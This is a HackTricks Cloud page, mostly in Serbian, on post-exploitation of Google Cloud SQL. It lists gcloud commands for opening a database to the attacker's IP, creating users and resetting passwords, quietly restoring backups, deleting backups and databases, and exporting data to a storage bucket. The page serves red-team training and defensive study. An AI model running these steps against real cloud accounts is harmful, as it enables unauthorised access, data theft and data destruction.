GCP - Cloud SQL Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Cloud SQL

Za više informacija o Cloud SQL, proverite:

GCP - Cloud SQL Enum

`cloudsql.instances.update`, ( `cloudsql.instances.get`)

Da biste se povezali na baze podataka, samo vam je potreban pristup portu baze podataka i da znate korisničko ime i lozinku, nema zahteva za IAM. Dakle, lak način da dobijete pristup, pod pretpostavkom da baza podataka ima javnu IP adresu, je da ažurirate dozvoljene mreže i dozvolite svojoj IP adresi da joj pristupi.

# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
--authorized-networks "$(curl ifconfig.me)" \
--assign-ip \
--quiet

mysql -h <ip_db> # If mysql

# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet

Takođe je moguće koristiti --no-backup da ometate rezervne kopije baze podataka.

S obzirom na to da su ovo zahtevi, nisam potpuno siguran koje su dozvole cloudsql.instances.connect i cloudsql.instances.login. Ako znate, pošaljite PR!

`cloudsql.users.list`

Dobijte spisak svih korisnika baze podataka:

gcloud sql users list --instance <intance-name>

`cloudsql.users.create`

Ova dozvola omogućava kreiranje novog korisnika unutar baze podataka:

gcloud sql users create <username> --instance <instance-name> --password <password>

`cloudsql.users.update`

Ova dozvola omogućava ažuriranje korisnika unutar baze podataka. Na primer, možete promeniti njegovu lozinku:

gcloud sql users set-password <username> --instance <instance-name> --password <password>

`cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`

Backup-i mogu sadržati stare osetljive informacije, pa je zanimljivo proveriti ih. Vrati backup unutar baze podataka:

gcloud sql backups restore <backup-id> --restore-instance <instance-id>

Da bi se to uradilo na diskretniji način, preporučuje se da se kreira nova SQL instanca i da se podaci oporave tamo umesto u trenutno aktivnim bazama podataka.

`cloudsql.backupRuns.delete`

Ova dozvola omogućava brisanje rezervnih kopija:

gcloud sql backups delete <backup-id> --instance <instance-id>

`cloudsql.instances.export`, `storage.objects.create`

Izvezite bazu podataka u Cloud Storage Bucket kako biste mogli da joj pristupite odatle:

# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>

`cloudsql.instances.import`, `storage.objects.get`

Uvezi bazu podataka (prepiši) iz Cloud Storage Bucket-a:

# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>

`cloudsql.databases.delete`

Obriši bazu podataka iz db instance:

gcloud sql databases delete <db-name> --instance <instance-id>

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousGCP - Cloud Shell Post Exploitation NextGCP - Compute Post Exploitation

Last updated 3 days ago

Cloud SQL

cloudsql.instances.update, ( cloudsql.instances.get)

cloudsql.users.list

cloudsql.users.create

cloudsql.users.update

cloudsql.instances.restoreBackup, cloudsql.backupRuns.get

cloudsql.backupRuns.delete

cloudsql.instances.export, storage.objects.create

cloudsql.instances.import, storage.objects.get

cloudsql.databases.delete

Cloud SQL

cloudsql.instances.update, ( cloudsql.instances.get)

cloudsql.users.list

cloudsql.users.create

cloudsql.users.update

cloudsql.instances.restoreBackup, cloudsql.backupRuns.get

cloudsql.backupRuns.delete

cloudsql.instances.export, storage.objects.create

cloudsql.instances.import, storage.objects.get

cloudsql.databases.delete

`cloudsql.instances.update`, ( `cloudsql.instances.get`)

`cloudsql.users.list`

`cloudsql.users.create`

`cloudsql.users.update`

`cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`

`cloudsql.backupRuns.delete`

`cloudsql.instances.export`, `storage.objects.create`

`cloudsql.instances.import`, `storage.objects.get`

`cloudsql.databases.delete`

`cloudsql.instances.update`, ( `cloudsql.instances.get`)

`cloudsql.users.list`

`cloudsql.users.create`

`cloudsql.users.update`

`cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`

`cloudsql.backupRuns.delete`

`cloudsql.instances.export`, `storage.objects.create`

`cloudsql.instances.import`, `storage.objects.get`

`cloudsql.databases.delete`